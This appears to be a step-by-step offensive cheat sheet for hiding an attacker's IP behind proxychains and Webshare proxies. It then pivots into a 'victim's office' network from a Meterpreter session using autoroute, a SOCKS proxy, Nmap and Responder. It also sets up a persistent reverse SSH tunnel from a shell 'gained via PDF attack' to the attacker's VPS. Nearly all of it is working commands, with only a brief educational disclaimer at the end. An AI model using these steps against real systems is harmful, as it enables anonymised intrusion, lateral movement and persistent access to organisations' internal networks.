Anonymity & Pivot Proxy Configuration
When to do this: Before you start your attack or log into your VPS. This masks your real IP address.
Open terminal in Parrot OS:
sudo nano /etc/proxychains4.conf
Essential Settings:
dynamic_chain (remove the
#)
proxy_dns (prevents ISP
from seeing DNS requests)
Scroll to the very bottom and add your Webshare info:
socks5 [Webshare_IP] [Port] [Username] [Password]
Example: socks5 123.45.67.89 1080 myuser mypass
Ctrl+O, Enter, then Ctrl+X
proxychains4 curl -s https://ipinfo.io
If it returns the IP and location of your proxy, the tunnel is working.
proxychains4 firefox-esr --private-window
Navigate to whatismybrowser.com
Confirm the IP matches your Webshare proxy.
When to do this: After you have an active Meterpreter session and want to use Parrot OS tools (like Nmap or Responder) against other computers inside the victim's office.
Inside your Meterpreter session:
run get_local_subnets
Note the range (e.g., 10.0.0.0/24)
run autoroute -s 10.0.0.0/24
Type these commands in msfconsole:
background
use auxiliary/server/socks_proxy
set SRVHOST 127.0.0.1
set SRVPORT 1080
set VERSION 5
run -j
Open a new terminal tab:
sudo nano /etc/proxychains4.conf
Go to the bottom:
→ Comment out (#) your Webshare proxy line
→ Add this line instead:
socks5 127.0.0.1 1080
Now any command with proxychains4 will go through your VPS, into the victim's computer, and out into their internal network.
Example - Nmap scan:
proxychains4 nmap -Pn -sT [Internal_Target_IP]
Example - Responder:
sudo proxychains4 responder -I eth0 -rdvw
Why SSH? This turns your VPS into a permanent bridge to the victim's network. More stable than Meterpreter!
You only need to do this once. It allows your VPS to "pass through" the connection.
1. Log into your VPS via terminal
2. Open the SSH config:
sudo nano /etc/ssh/sshd_config
3. Find
GatewayPorts and change it
to:
GatewayPorts yes
(Remove the # if there is one)
4. Save and restart SSH:
Ctrl+O, Enter, Ctrl+X
sudo service ssh restart
Run this command from the victim's terminal (shell you gained via PDF attack):
shell
ssh -f -N -R 8080:localhost:80 root@[Your_VPS_IP] -o
ServerAliveInterval=60
What each part means:
-f: Runs in background,
stays alive if terminal closes
-N: Just a tunnel, no
remote command execution
-R 8080:localhost:80:
Forwards victim's traffic to your VPS port 8080
-o ServerAliveInterval=60:
Heartbeat every 60 seconds to prevent timeout
Now you can view their internal website from your browser:
Open Firefox on your Parrot OS laptop
Go to:
http://[Your_VPS_IP]:8080
You are now viewing their internal website as if you were sitting at their desk!
Use Nmap, Responder, and other tools through the stable SSH tunnel:
1. Create local SOCKS tunnel:
ssh -D 9050 root@[Your_VPS_IP]
2. Update proxychains:
sudo nano /etc/proxychains4.conf
Add this line at the bottom:
socks5 127.0.0.1 9050
3. Use proxychains with any tool:
proxychains4 nmap [Internal_IP]
Port 8080: This is just a "mailbox" on your VPS. Anything sent there is forwarded through the tunnel to the victim.
Persistence: If the victim reboots, you must run the SSH tunnel command again unless you have added it to a startup script.
Stability: SSH is a legitimate system process. Unlike Meterpreter, it won't crash if the RAM usage spikes or the connection flickers.
DISCLAIMER
This information is for educational purposes only. Unauthorized access to computer systems is illegal. Always have written authorization before testing.